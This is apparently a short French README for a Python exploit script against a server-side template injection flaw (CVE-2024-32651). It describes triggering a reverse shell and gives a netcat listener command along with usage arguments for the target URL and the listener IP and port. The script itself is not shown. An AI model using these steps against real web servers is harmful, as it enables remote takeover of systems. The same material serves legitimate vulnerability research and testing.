
Server-Side Template Injection Exploit
Exploit d'injection de modèles côté serveur !!
Exécution de code à distance via une injection de modèles côté serveur (SSTI) dans une application web vulnérable
Cet exploit cible une application web vulnérable à l'injection de modèles côté serveur (SSTI). En exploitant cette vulnérabilité, un attaquant peut exécuter des commandes arbitraires sur le serveur. Le script Python fourni automatise le processus d'exploitation en soumettant une charge utile qui déclenche un reverse shell.
Pour reproduire la vulnérabilité, exécutez le script Python fourni contre l'application web vulnérable. Assurez-vous d'avoir un écouteur (par exemple, nc -lvp 9999) en cours d'exécution pour capturer la connexion du reverse shell.
Enregistrez le script dans un fichier nommé CVE-2024-32651.py.
Installez les bibliothèques Python requises si ce n'est pas déjà fait :
pip install requests beautifulsoup4
Pour utiliser le script, fournissez les arguments suivants en ligne de commande :
--url: URL de base de l'application web vulnérable (par exemple, http://10.10.10.10:5000).--port: Port de l'écouteur (par exemple, 9999).--ip: Adresse IP de l'écouteur (par exemple, 10.10.50.22).--notification: (Optionnel) URL de notification si vous souhaitez utiliser une URL de notification spécifique.python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
Cette version corrigée de l'exploit est basée sur un exploit original publié par Zach Crosman (zcrosman) avec l'EDB-ID : 52027. Vous pouvez consulter l'exploit original ici. Je remercie Zach Crosman pour sa contribution à la communauté de la sécurité.